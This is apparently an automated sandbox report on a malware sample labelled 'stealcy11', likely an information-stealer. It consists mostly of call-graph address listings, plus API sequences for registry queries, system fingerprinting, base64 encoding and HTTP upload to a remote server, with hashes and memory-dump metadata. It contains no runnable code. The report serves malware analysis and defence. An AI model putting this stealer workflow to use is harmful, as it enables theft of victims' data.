8e3739 5889->5890 5891 8e4980 34 API calls 5890->5891 5892 8e374f 5891->5892 5893 8e4980 34 API calls 5892->5893 5894 8e3765 5893->5894 5895 8e4980 34 API calls 5894->5895 5896 8e377b 5895->5896 5897 8e4980 34 API calls 5896->5897 5898 8e3791 5897->5898 5899 8e4980 34 API calls 5898->5899 5900 8e37a7 5899->5900 5901 8e4980 34 API calls 5900->5901 5902 8e37c0 5901->5902 5903 8e4980 34 API calls 5902->5903 5904 8e37d6 5903->5904 5905 8e4980 34 API calls 5904->5905 5906 8e37ec 5905->5906 5907 8e4980 34 API calls 5906->5907 5908 8e3802 5907->5908 5909 8e4980 34 API calls 5908->5909 5910 8e3818 5909->5910 5911 8e4980 34 API calls 5910->5911 5912 8e382e 5911->5912 5913 8e4980 34 API calls 5912->5913 5914 8e3847 5913->5914 5915 8e4980 34 API calls 5914->5915 5916 8e385d 5915->5916 5917 8e4980 34 API calls 5916->5917 5918 8e3873 5917->5918 5919 8e4980 34 API calls 5918->5919 5920 8e3889 5919->5920 5921 8e4980 34 API calls 5920->5921 5922 8e389f 5921->5922 5923 8e4980 34 API calls 5922->5923 5924 8e38b5 5923->5924 5925 8e4980 34 API calls 5924->5925 5926 8e38ce 5925->5926 5927 8e4980 34 API calls 5926->5927 5928 8e38e4 5927->5928 5929 8e4980 34 API calls 5928->5929 5930 8e38fa 5929->5930 5931 8e4980 34 API calls 5930->5931 5932 8e3910 5931->5932 5933 8e4980 34 API calls 5932->5933 5934 8e3926 5933->5934 5935 8e4980 34 API calls 5934->5935 5936 8e393c 5935->5936 5937 8e4980 34 API calls 5936->5937 5938 8e3955 5937->5938 5939 8e4980 34 API calls 5938->5939 5940 8e396b 5939->5940 5941 8e4980 34 API calls 5940->5941 5942 8e3981 5941->5942 5943 8e4980 34 API calls 5942->5943 5944 8e3997 5943->5944 5945 8e4980 34 API calls 5944->5945 5946 8e39ad 5945->5946 5947 8e4980 34 API calls 5946->5947 5948 8e39c3 5947->5948 5949 8e4980 34 API calls 5948->5949 5950 8e39dc 5949->5950 5951 8e4980 34 API calls 5950->5951 5952 8e39f2 5951->5952 5953 8e4980 34 API calls 5952->5953 5954 8e3a08 5953->5954 5955 8e4980 34 API calls 5954->5955 5956 8e3a1e 5955->5956 5957 8e4980 34 API calls 5956->5957 5958 8e3a34 5957->5958 5959 8e4980 34 API calls 5958->5959 5960 8e3a4a 5959->5960 5961 8e4980 34 API calls 5960->5961 5962 8e3a63 5961->5962 5963 8e4980 34 API calls 5962->5963 5964 8e3a79 5963->5964 5965 8e4980 34 API calls 5964->5965 5966 8e3a8f 5965->5966 5967 8e4980 34 API calls 5966->5967 5968 8e3aa5 5967->5968 5969 8e4980 34 API calls 5968->5969 5970 8e3abb 5969->5970 5971 8e4980 34 API calls 5970->5971 5972 8e3ad1 5971->5972 5973 8e4980 34 API calls 5972->5973 5974 8e3aea 5973->5974 5975 8e4980 34 API calls 5974->5975 5976 8e3b00 5975->5976 5977 8e4980 34 API calls 5976->5977 5978 8e3b16 5977->5978 5979 8e4980 34 API calls 5978->5979 5980 8e3b2c 5979->5980 5981 8e4980 34 API calls 5980->5981 5982 8e3b42 5981->5982 5983 8e4980 34 API calls 5982->5983 5984 8e3b58 5983->5984 5985 8e4980 34 API calls 5984->5985 5986 8e3b71 5985->5986 5987 8e4980 34 API calls 5986->5987 5988 8e3b87 5987->5988 5989 8e4980 34 API calls 5988->5989 5990 8e3b9d 5989->5990 5991 8e4980 34 API calls 5990->5991 5992 8e3bb3 5991->5992 5993 8e4980 34 API calls 5992->5993 5994 8e3bc9 5993->5994 5995 8e4980 34 API calls 5994->5995 5996 8e3bdf 5995->5996 5997 8e4980 34 API calls 5996->5997 5998 8e3bf8 5997->5998 5999 8e4980 34 API calls 5998->5999 6000 8e3c0e 5999->6000 6001 8e4980 34 API calls 6000->6001 6002 8e3c24 6001->6002 6003 8e4980 34 API calls 6002->6003 6004 8e3c3a 6003->6004 6005 8e4980 34 API calls 6004->6005 6006 8e3c50 6005->6006 6007 8e4980 34 API calls 6006->6007 6008 8e3c66 6007->6008 6009 8e4980 34 API calls 6008->6009 6010 8e3c7f 6009->6010 6011 8e4980 34 API calls 6010->6011 6012 8e3c95 6011->6012 6013 8e4980 34 API calls 6012->6013 6014 8e3cab 6013->6014 6015 8e4980 34 API calls 6014->6015 6016 8e3cc1 6015->6016 6017 8e4980 34 API calls 6016->6017 6018 8e3cd7 6017->6018 6019 8e4980 34 API calls 6018->6019 6020 8e3ced 6019->6020 6021 8e4980 34 API calls 6020->6021 6022 8e3d06 6021->6022 6023 8e4980 34 API calls 6022->6023 6024 8e3d1c 6023->6024 6025 8e4980 34 API calls 6024->6025 6026 8e3d32 6025->6026 6027 8e4980 34 API calls 6026->6027 6028 8e3d48 6027->6028 6029 8e4980 34 API calls 6028->6029 6030 8e3d5e 6029->6030 6031 8e4980 34 API calls 6030->6031 6032 8e3d74 6031->6032 6033 8e4980 34 API calls 6032->6033 6034 8e3d8d 6033->6034 6035 8e4980 34 API calls 6034->6035 6036 8e3da3 6035->6036 6037 8e4980 34 API calls 6036->6037 6038 8e3db9 6037->6038 6039 8e4980 34 API calls 6038->6039 6040 8e3dcf 6039->6040 6041 8e4980 34 API calls 6040->6041 6042 8e3de5 6041->6042 6043 8e4980 34 API calls 6042->6043 6044 8e3dfb 6043->6044 6045 8e4980 34 API calls 6044->6045 6046 8e3e14 6045->6046 6047 8e4980 34 API calls 6046->6047 6048 8e3e2a 6047->6048 6049 8e4980 34 API calls 6048->6049 6050 8e3e40 6049->6050 6051 8e4980 34 API calls 6050->6051 6052 8e3e56 6051->6052 6053 8e4980 34 API calls 6052->6053 6054 8e3e6c 6053->6054 6055 8e4980 34 API calls 6054->6055 6056 8e3e82 6055->6056 6057 8e4980 34 API calls 6056->6057 6058 8e3e9b 6057->6058 6059 8e4980 34 API calls 6058->6059 6060 8e3eb1 6059->6060 6061 8e4980 34 API calls 6060->6061 6062 8e3ec7 6061->6062 6063 8e4980 34 API calls 6062->6063 6064 8e3edd 6063->6064 6065 8e4980 34 API calls 6064->6065 6066 8e3ef3 6065->6066 6067 8e4980 34 API calls 6066->6067 6068 8e3f09 6067->6068 6069 8e4980 34 API calls 6068->6069 6070 8e3f22 6069->6070 6071 8e4980 34 API calls 6070->6071 6072 8e3f38 6071->6072 6073 8e4980 34 API calls 6072->6073 6074 8e3f4e 6073->6074 6075 8e4980 34 API calls 6074->6075 6076 8e3f64 6075->6076 6077 8e4980 34 API calls 6076->6077 6078 8e3f7a 6077->6078 6079 8e4980 34 API calls 6078->6079 6080 8e3f90 6079->6080 6081 8e4980 34 API calls 6080->6081 6082 8e3fa9 6081->6082 6083 8e4980 34 API calls 6082->6083 6084 8e3fbf 6083->6084 6085 8e4980 34 API calls 6084->6085 6086 8e3fd5 6085->6086 6087 8e4980 34 API calls 6086->6087 6088 8e3feb 6087->6088 6089 8e4980 34 API calls 6088->6089 6090 8e4001 6089->6090 6091 8e4980 34 API calls 6090->6091 6092 8e4017 6091->6092 6093 8e4980 34 API calls 6092->6093 6094 8e4030 6093->6094 6095 8e4980 34 API calls 6094->6095 6096 8e4046 6095->6096 6097 8e4980 34 API calls 6096->6097 6098 8e405c 6097->6098 6099 8e4980 34 API calls 6098->6099 6100 8e4072 6099->6100 6101 8e4980 34 API calls 6100->6101 6102 8e4088 6101->6102 6103 8e4980 34 API calls 6102->6103 6104 8e409e 6103->6104 6105 8e4980 34 API calls 6104->6105 6106 8e40b7 6105->6106 6107 8e4980 34 API calls 6106->6107 6108 8e40cd 6107->6108 6109 8e4980 34 API calls 6108->6109 6110 8e40e3 6109->6110 6111 8e4980 34 API calls 6110->6111 6112 8e40f9 6111->6112 6113 8e4980 34 API calls 6112->6113 6114 8e410f 6113->6114 6115 8e4980 34 API calls 6114->6115 6116 8e4125 6115->6116 6117 8e4980 34 API calls 6116->6117 6118 8e413e 6117->6118 6119 8e4980 34 API calls 6118->6119 6120 8e4154 6119->6120 6121 8e4980 34 API calls 6120->6121 6122 8e416a 6121->6122 6123 8e4980 34 API calls 6122->6123 6124 8e4180 6123->6124 6125 8e4980 34 API calls 6124->6125 6126 8e4196 6125->6126 6127 8e4980 34 API calls 6126->6127 6128 8e41ac 6127->6128 6129 8e4980 34 API calls 6128->6129 6130 8e41c5 6129->6130 6131 8e4980 34 API calls 6130->6131 6132 8e41db 6131->6132 6133 8e4980 34 API calls 6132->6133 6134 8e41f1 6133->6134 6135 8e4980 34 API calls 6134->6135 6136 8e4207 6135->6136 6137 8e4980 34 API calls 6136->6137 6138 8e421d 6137->6138 6139 8e4980 34 API calls 6138->6139 6140 8e4233 6139->6140 6141 8e4980 34 API calls 6140->6141 6142 8e424c 6141->6142 6143 8e4980 34 API calls 6142->6143 6144 8e4262 6143->6144 6145 8e4980 34 API calls 6144->6145 6146 8e4278 6145->6146 6147 8e4980 34 API calls 6146->6147 6148 8e428e 6147->6148 6149 8e4980 34 API calls 6148->6149 6150 8e42a4 6149->6150 6151 8e4980 34 API calls 6150->6151 6152 8e42ba 6151->6152 6153 8e4980 34 API calls 6152->6153 6154 8e42d3 6153->6154 6155 8e4980 34 API calls 6154->6155 6156 8e42e9 6155->6156 6157 8e4980 34 API calls 6156->6157 6158 8e42ff 6157->6158 6159 8e4980 34 API calls 6158->6159 6160 8e4315 6159->6160 6161 8e4980 34 API calls 6160->6161 6162 8e432b 6161->6162 6163 8e4980 34 API calls 6162->6163 6164 8e4341 6163->6164 6165 8e4980 34 API calls 6164->6165 6166 8e435a 6165->6166 6167 8e4980 34 API calls 6166->6167 6168 8e4370 6167->6168 6169 8e4980 34 API calls 6168->6169 6170 8e4386 6169->6170 6171 8e4980 34 API calls 6170->6171 6172 8e439c 6171->6172 6173 8e4980 34 API calls 6172->6173 6174 8e43b2 6173->6174 6175 8e4980 34 API calls 6174->6175 6176 8e43c8 6175->6176 6177 8e4980 34 API calls 6176->6177 6178 8e43e1 6177->6178 6179 8e4980 34 API calls 6178->6179 6180 8e43f7 6179->6180 6181 8e4980 34 API calls 6180->6181 6182 8e440d 6181->6182 6183 8e4980 34 API calls 6182->6183 6184 8e4423 6183->6184 6185 8e4980 34 API calls 6184->6185 6186 8e4439 6185->6186 6187 8e4980 34 API calls 6186->6187 6188 8e444f 6187->6188 6189 8e4980 34 API calls 6188->6189 6190 8e4468 6189->6190 6191 8e4980 34 API calls 6190->6191 6192 8e447e 6191->6192 6193 8e4980 34 API calls 6192->6193 6194 8e4494 6193->6194 6195 8e4980 34 API calls 6194->6195 6196 8e44aa 6195->6196 6197 8e4980 34 API calls 6196->6197 6198 8e44c0 6197->6198 6199 8e4980 34 API calls 6198->6199 6200 8e44d6 6199->6200 6201 8e4980 34 API calls 6200->6201 6202 8e44ef 6201->6202 6203 8e4980 34 API calls 6202->6203 6204 8e4505 6203->6204 6205 8e4980 34 API calls 6204->6205 6206 8e451b 6205->6206 6207 8e4980 34 API calls 6206->6207 6208 8e4531 6207->6208 6209 8e4980 34 API calls 6208->6209 6210 8e4547 6209->6210 6211 8e4980 34 API calls 6210->6211 6212 8e455d 6211->6212 6213 8e4980 34 API calls 6212->6213 6214 8e4576 6213->6214 6215 8e4980 34 API calls 6214->6215 6216 8e458c 6215->6216 6217 8e4980 34 API calls 6216->6217 6218 8e45a2 6217->6218 6219 8e4980 34 API calls 6218->6219 6220 8e45b8 6219->6220 6221 8e4980 34 API calls 6220->6221 6222 8e45ce 6221->6222 6223 8e4980 34 API calls 6222->6223 6224 8e45e4 6223->6224 6225 8e4980 34 API calls 6224->6225 6226 8e45fd 6225->6226 6227 8e4980 34 API calls 6226->6227 6228 8e4613 6227->6228 6229 8e4980 34 API calls 6228->6229 6230 8e4629 6229->6230 6231 8e4980 34 API calls 6230->6231 6232 8e463f 6231->6232 6233 8e4980 34 API calls 6232->6233 6234 8e4655 6233->6234 6235 8e4980 34 API calls 6234->6235 6236 8e466b 6235->6236 6237 8e4980 34 API calls 6236->6237 6238 8e4684 6237->6238 6239 8e4980 34 API calls 6238->6239 6240 8e469a 6239->6240 6241 8e4980 34 API calls 6240->6241 6242 8e46b0 6241->6242 6243 8e4980 34 API calls 6242->6243 6244 8e46c6 6243->6244 6245 8e4980 34 API calls 6244->6245 6246 8e46dc 6245->6246 6247 8e4980 34 API calls 6246->6247 6248 8e46f2 6247->6248 6249 8e4980 34 API calls 6248->6249 6250 8e470b 6249->6250 6251 8e4980 34 API calls 6250->6251 6252 8e4721 6251->6252 6253 8e4980 34 API calls 6252->6253 6254 8e4737 6253->6254 6255 8e4980 34 API calls 6254->6255 6256 8e474d 6255->6256 6257 8e4980 34 API calls 6256->6257 6258 8e4763 6257->6258 6259 8e4980 34 API calls 6258->6259 6260 8e4779 6259->6260 6261 8e4980 34 API calls 6260->6261 6262 8e4792 6261->6262 6263 8e4980 34 API calls 6262->6263 6264 8e47a8 6263->6264 6265 8e4980 34 API calls 6264->6265 6266 8e47be 6265->6266 6267 8e4980 34 API calls 6266->6267 6268 8e47d4 6267->6268 6269 8e4980 34 API calls 6268->6269 6270 8e47ea 6269->6270 6271 8e4980 34 API calls 6270->6271 6272 8e4800 6271->6272 6273 8e4980 34 API calls 6272->6273 6274 8e4819 6273->6274 6275 8e4980 34 API calls 6274->6275 6276 8e482f 6275->6276 6277 8e4980 34 API calls 6276->6277 6278 8e4845 6277->6278 6279 8e4980 34 API calls 6278->6279 6280 8e485b 6279->6280 6281 8e4980 34 API calls 6280->6281 6282 8e4871 6281->6282 6283 8e4980 34 API calls 6282->6283 6284 8e4887 6283->6284 6285 8e4980 34 API calls 6284->6285 6286 8e48a0 6285->6286 6287 8e4980 34 API calls 6286->6287 6288 8e48b6 6287->6288 6289 8e4980 34 API calls 6288->6289 6290 8e48cc 6289->6290 6291 8e4980 34 API calls 6290->6291 6292 8e48e2 6291->6292 6293 8e4980 34 API calls 6292->6293 6294 8e48f8 6293->6294 6295 8e4980 34 API calls 6294->6295 6296 8e490e 6295->6296 6297 8e4980 34 API calls 6296->6297 6298 8e4927 6297->6298 6299 8e4980 34 API calls 6298->6299 6300 8e493d 6299->6300 6301 8e4980 34 API calls 6300->6301 6302 8e4953 6301->6302 6303 8e4980 34 API calls 6302->6303 6304 8e4969 6303->6304 5289 902820 GetProcessHeap HeapAlloc 5296 9028b0 GetProcessHeap HeapAlloc RegOpenKeyExA 5289->5296 5291 902849 5292 902850 5291->5292 5293 90285a RegOpenKeyExA 5291->5293 5294 902892 RegCloseKey 5293->5294 5295 90287b RegQueryValueExA 5293->5295 5295->5294 5297 9028f5 RegQueryValueExA 5296->5297 5298 90290b RegCloseKey 5296->5298 5297->5298 5299 902920 5298->5299 5299->5291 5299->5299 5482 9026e0 GetWindowsDirectoryA 5483 902725 5482->5483 5484 90272c GetVolumeInformationA 5482->5484 5483->5484 5485 90278c GetProcessHeap HeapAlloc 5484->5485 5487 9027c2 5485->5487 5488 9027c6 wsprintfA 5485->5488 5491 907210 5487->5491 5488->5487 5492 907216 5491->5492 5493 902800 5492->5493 5494 90722c lstrcpy 5492->5494 5494->5493 6305 8e5570 GetProcessHeap RtlAllocateHeap InternetOpenA InternetOpenUrlA 6306 8e5627 InternetCloseHandle InternetCloseHandle 6305->6306 6307 8e55d1 6305->6307 6311 8e563f 6306->6311 6308 8e55d8 InternetReadFile 6307->6308 6309 8e5623 6307->6309 6310 8e5600 LdrInitializeThunk 6307->6310 6308->6307 6308->6309 6309->6306 6310->6307 6310->6310 6407 8fef30 6408 8fef50 6407->6408 6409 8fef68 6408->6409 6410 8fef60 lstrcpy 6408->6410 6415 8e1410 6409->6415 6410->6409 6414 8fef7e 6416 8e1510 4 API calls 6415->6416 6417 8e141b 6416->6417 6418 8e1435 lstrcpy 6417->6418 6419 8e143d 6417->6419 6418->6419 6420 8e1457 lstrcpy 6419->6420 6421 8e145f 6419->6421 6420->6421 6422 8e1479 lstrcpy 6421->6422 6423 8e1481 6421->6423 6422->6423 6424 8e14e5 6423->6424 6425 8e14dd lstrcpy 6423->6425 6426 8e56c0 6424->6426 6425->6424 6427 8e56e0 6426->6427 6428 8e56f5 6427->6428 6429 8e56ed lstrcpy 6427->6429 6430 8e4ae0 5 API calls 6428->6430 6429->6428 6431 8e5700 6430->6431 6574 904090 6431->6574 6433 8e5736 lstrlenA 6434 904090 4 API calls 6433->6434 6435 8e5755 6434->6435 6436 8e577e lstrcpy 6435->6436 6437 8e578a 6435->6437 6436->6437 6438 8e57bd lstrcpy 6437->6438 6439 8e57c9 6437->6439 6438->6439 6440 8e57ed lstrcpy 6439->6440 6441 8e57f9 6439->6441 6440->6441 6442 8e5822 lstrcpy 6441->6442 6443 8e582e 6441->6443 6442->6443 6444 8e585c lstrcpy 6443->6444 6445 8e5868 InternetOpenA StrCmpCA 6443->6445 6444->6445 6446 8e589c 6445->6446 6447 8e5f34 InternetCloseHandle 6446->6447 6448 903e10 3 API calls 6446->6448 6466 8e5f6a 6447->6466 6449 8e58b6 6448->6449 6450 8e58de lstrcpy lstrcatA 6449->6450 6451 8e58f3 6449->6451 6450->6451 6452 8e5912 lstrcpy 6451->6452 6453 8e591a 6451->6453 6452->6453 6454 8e5929 lstrlenA 6453->6454 6455 8e5941 6454->6455 6456 8e594e lstrcpy lstrcatA 6455->6456 6458 8e5962 6455->6458 6456->6458 6457 8e598f lstrlenA 6459 8e59a5 6457->6459 6458->6457 6460 8e597c lstrcpy lstrcatA 6458->6460 6461 8e59af lstrcpy lstrcatA 6459->6461 6462 8e59c3 6459->6462 6460->6457 6461->6462 6463 8e59e2 lstrcpy 6462->6463 6464 8e59ea 6462->6464 6463->6464 6465 8e59ff lstrlenA 6464->6465 6467 8e5a1a 6465->6467 6466->6414 6468 8e5a2b lstrcpy lstrcatA 6467->6468 6469 8e5a3b 6467->6469 6468->6469 6470 8e5a59 lstrcpy lstrcatA 6469->6470 6471 8e5a6c 6469->6471 6470->6471 6472 8e5a8a lstrcpy 6471->6472 6473 8e5a92 6471->6473 6472->6473 6474 8e5aa0 InternetConnectA 6473->6474 6475 8e5f2e 6474->6475 6476 8e5acf HttpOpenRequestA 6474->6476 6475->6447 6477 8e5b0b 6476->6477 6478 8e5f27 InternetCloseHandle 6476->6478 6479 907340 3 API calls 6477->6479 6478->6475 6480 8e5b1b 6479->6480 6481 9072b0 lstrcpy 6480->6481 6482 8e5b24 6481->6482 6483 9072f0 2 API calls 6482->6483 6484 8e5b37 6483->6484 6485 9072b0 lstrcpy 6484->6485 6486 8e5b40 6485->6486 6487 907340 3 API calls 6486->6487 6488 8e5b55 6487->6488 6489 9072b0 lstrcpy 6488->6489 6490 8e5b5e 6489->6490 6491 907340 3 API calls 6490->6491 6492 8e5b74 6491->6492 6493 9072b0 lstrcpy 6492->6493 6494 8e5b7d 6493->6494 6495 907340 3 API calls 6494->6495 6496 8e5b93 6495->6496 6497 9072b0 lstrcpy 6496->6497 6498 8e5b9c 6497->6498 6499 907340 3 API calls 6498->6499 6500 8e5bb1 6499->6500 6501 9072b0 lstrcpy 6500->6501 6502 8e5bba 6501->6502 6503 9072f0 2 API calls 6502->6503 6504 8e5bcd 6503->6504 6505 9072b0 lstrcpy 6504->6505 6506 8e5bd6 6505->6506 6507 907340 3 API calls 6506->6507 6508 8e5beb 6507->6508 6509 9072b0 lstrcpy 6508->6509 6510 8e5bf4 6509->6510 6511 907340 3 API calls 6510->6511 6512 8e5c09 6511->6512 6513 9072b0 lstrcpy 6512->6513 6514 8e5c12 6513->6514 6515 9072f0 2 API calls 6514->6515 6516 8e5c25 6515->6516 6517 9072b0 lstrcpy 6516->6517 6518 8e5c2e 6517->6518 6519 907340 3 API calls 6518->6519 6520 8e5c43 6519->6520 6521 9072b0 lstrcpy 6520->6521 6522 8e5c4c 6521->6522 6523 907340 3 API calls 6522->6523 6524 8e5c62 6523->6524 6525 9072b0 lstrcpy 6524->6525 6526 8e5c6b 6525->6526 6527 907340 3 API calls 6526->6527 6528 8e5c81 6527->6528 6529 9072b0 lstrcpy 6528->6529 6530 8e5c8a 6529->6530 6531 907340 3 API calls 6530->6531 6532 8e5c9f 6531->6532 6533 9072b0 lstrcpy 6532->6533 6534 8e5ca8 6533->6534 6535 907340 3 API calls 6534->6535 6536 8e5cbb 6535->6536 6537 9072b0 lstrcpy 6536->6537 6538 8e5cc4 6537->6538 6539 907340 3 API calls 6538->6539 6540 8e5cd9 6539->6540 6541 9072b0 lstrcpy 6540->6541 6542 8e5ce2 6541->6542 6543 907340 3 API calls 6542->6543 6544 8e5cf7 6543->6544 6545 9072b0 lstrcpy 6544->6545 6546 8e5d00 6545->6546 6547 9072f0 2 API calls 6546->6547 6548 8e5d13 6547->6548 6549 9072b0 lstrcpy 6548->6549 6550 8e5d1c 6549->6550 6551 907340 3 API calls 6550->6551 6552 8e5d31 6551->6552 6553 9072b0 lstrcpy 6552->6553 6554 8e5d3a 6553->6554 6555 907340 3 API calls 6554->6555 6556 8e5d50 6555->6556 6557 9072b0 lstrcpy 6556->6557 6558 8e5d59 6557->6558 6559 907340 3 API calls 6558->6559 6560 8e5d6f 6559->6560 6561 9072b0 lstrcpy 6560->6561 6562 8e5d78 6561->6562 6563 907340 3 API calls 6562->6563 6564 8e5d8d 6563->6564 6565 9072b0 lstrcpy 6564->6565 6566 8e5d96 6565->6566 6567 8e5d9e 14 API calls 6566->6567 6568 8e5f1a InternetCloseHandle 6567->6568 6572 8e5e6a 6567->6572 6568->6478 6569 8e5e7b lstrlenA 6569->6572 6570 8e5eac lstrcpy lstrcatA 6570->6572 6571 8e5ee9 lstrcpy 6571->6572 6572->6568 6572->6569 6572->6570 6572->6571 6573 8e5ef8 InternetReadFile 6572->6573 6573->6568 6573->6572 6575 9040a0 CryptBinaryToStringA 6574->6575 6576 90409a 6574->6576 6575->6576 6577 9040b7 GetProcessHeap HeapAlloc 6575->6577 6576->6433 6577->6576 6578 9040d2 CryptBinaryToStringA 6577->6578 6578->6433
                                  APIs
                                  • lstrcpy.KERNEL32(00000000,?), ref: 008E4BAF
                                  • lstrcpy.KERNEL32(00000000,0090D014), ref: 008E4C02
                                  • lstrcpy.KERNEL32(00000000,0090D014), ref: 008E4C35
                                  • lstrcpy.KERNEL32(00000000,0090D014), ref: 008E4C65
                                  • lstrcpy.KERNEL32(00000000,0090D014), ref: 008E4CA3
                                  • lstrcpy.KERNEL32(00000000,0090D014), ref: 008E4CD6
                                  • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 008E4CE6
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1846899554.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                  • Associated: 00000000.00000002.1846876474.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846931588.000000000090B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846954653.0000000000917000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.0000000000918000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.0000000000923000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.000000000092B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.000000000094E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.0000000000951000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.0000000000960000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.0000000000973000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.00000000009AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.00000000009BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.00000000009D9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.00000000009E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.0000000000A02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.0000000000A3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.0000000000A60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.0000000000B18000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1847465653.0000000000B2A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_8e0000_stealcy11.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$InternetOpen
                                  • String ID: "$------
                                  • API String ID: 2041821634-2370822465
                                  • Opcode ID: ae8dcca9af472f32055079f92bb68bc62b5b787b907d158f2cde49efe1371428
                                  • Instruction ID: f5f5f25b3c8dd4bf35211fb52bc38923f7d9979922704d9cd902c57807a63d88
                                  • Opcode Fuzzy Hash: ae8dcca9af472f32055079f92bb68bc62b5b787b907d158f2cde49efe1371428
                                  • Instruction Fuzzy Hash: 54527D31D016969FCB20ABB9CC49B9EBBB9FF46310F155024F909E7251DB70ED428BA1

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 1467 8e56c0-8e56e4 call 8e2840 1470 8e56e6-8e56eb 1467->1470 1471 8e56f5-8e56fb call 8e4ae0 1467->1471 1470->1471 1472 8e56ed-8e56ef lstrcpy 1470->1472 1474 8e5700-8e5760 call 904090 lstrlenA call 904090 1471->1474 1472->1471 1479 8e576c-8e577c call 8e2840 1474->1479 1480 8e5762-8e576a 1474->1480 1483 8e577e-8e5784 lstrcpy 1479->1483 1484 8e578a-8e5795 1479->1484 1480->1479 1480->1480 1483->1484 1485 8e57ad-8e57bb call 8e2840 1484->1485 1486 8e5797 1484->1486 1491 8e57bd-8e57c3 lstrcpy 1485->1491 1492 8e57c9-8e57d1 1485->1492 1487 8e57a0-8e57a8 1486->1487 1487->1487 1489 8e57aa 1487->1489 1489->1485 1491->1492 1493 8e57dd-8e57eb call 8e2840 1492->1493 1494 8e57d3-8e57db 1492->1494 1497 8e57ed-8e57f3 lstrcpy 1493->1497 1498 8e57f9-8e5804 1493->1498 1494->1493 1494->1494 1497->1498 1499 8e5806-8e580e 1498->1499 1500 8e5813-8e5820 call 8e2840 1498->1500 1499->1499 1501 8e5810 1499->1501 1504 8e582e-8e5839 1500->1504 1505 8e5822-8e5828 lstrcpy 1500->1505 1501->1500 1506 8e584d-8e585a call 8e2840 1504->1506 1507 8e583b 1504->1507 1505->1504 1512 8e585c-8e5862 lstrcpy 1506->1512 1513 8e5868-8e589a InternetOpenA StrCmpCA 1506->1513 1509 8e5840-8e5848 1507->1509 1509->1509 1511 8e584a 1509->1511 1511->1506 1512->1513 1514 8e589c 1513->1514 1515 8e58a3-8e58a5 1513->1515 1514->1515 1516 8e58ab-8e58d3 call 903e10 call 8e2840 1515->1516 1517 8e5f34-8e5ff3 InternetCloseHandle call 8e2930 * 17 1515->1517 1527 8e58d5-8e58d7 1516->1527 1528 8e58f3-8e58f8 1516->1528 1527->1528 1530 8e58d9-8e58dc 1527->1530 1531 8e58ff-8e590c call 8e2840 1528->1531 1532 8e58fa call 8e2930 1528->1532 1530->1528 1536 8e58de-8e58f0 lstrcpy lstrcatA 1530->1536 1539 8e590e-8e5910 1531->1539 1540 8e591a-8e5945 call 8e2930 * 2 lstrlenA call 8e2840 1531->1540 1532->1531 1536->1528 1539->1540 1542 8e5912-8e5914 lstrcpy 1539->1542 1555 8e5947-8e594c 1540->1555 1556 8e5962-8e5970 call 8e2840 1540->1556 1542->1540 1555->1556 1559 8e594e-8e595c lstrcpy lstrcatA 1555->1559 1564 8e598f-8e59a9 lstrlenA call 8e2840 1556->1564 1565 8e5972-8e5974 1556->1565 1559->1556 1573 8e59ab-8e59ad 1564->1573 1574 8e59c3-8e59c8 1564->1574 1565->1564 1567 8e5976-8e597a 1565->1567 1567->1564 1570 8e597c-8e5989 lstrcpy lstrcatA 1567->1570 1570->1564 1573->1574 1576 8e59af-8e59bd lstrcpy lstrcatA 1573->1576 1577 8e59cf-8e59dc call 8e2840 1574->1577 1578 8e59ca call 8e2930 1574->1578 1576->1574 1584 8e59de-8e59e0 1577->1584 1585 8e59ea-8e5a1e call 8e2930 * 3 lstrlenA call 8e2840 1577->1585 1578->1577 1584->1585 1587 8e59e2-8e59e4 lstrcpy 1584->1587 1604 8e5a3b-8e5a4d call 8e2840 1585->1604 1605 8e5a20-8e5a25 1585->1605 1587->1585 1610 8e5a4f-8e5a51 1604->1610 1611 8e5a6c-8e5a71 1604->1611 1605->1604 1606 8e5a27-8e5a29 1605->1606 1606->1604 1609 8e5a2b-8e5a35 lstrcpy lstrcatA 1606->1609 1609->1604 1610->1611 1612 8e5a53-8e5a57 1610->1612 1613 8e5a78-8e5a84 call 8e2840 1611->1613 1614 8e5a73 call 8e2930 1611->1614 1612->1611 1615 8e5a59-8e5a66 lstrcpy lstrcatA 1612->1615 1619 8e5a86-8e5a88 1613->1619 1620 8e5a92-8e5ac9 call 8e2930 * 2 InternetConnectA 1613->1620 1614->1613 1615->1611 1619->1620 1621 8e5a8a-8e5a8c lstrcpy 1619->1621 1626 8e5f2e-8e5f31 1620->1626 1627 8e5acf-8e5b05 HttpOpenRequestA 1620->1627 1621->1620 1626->1517 1628 8e5b0b-8e5e64 call 907340 call 9072b0 call 8e2930 call 9072f0 call 9072b0 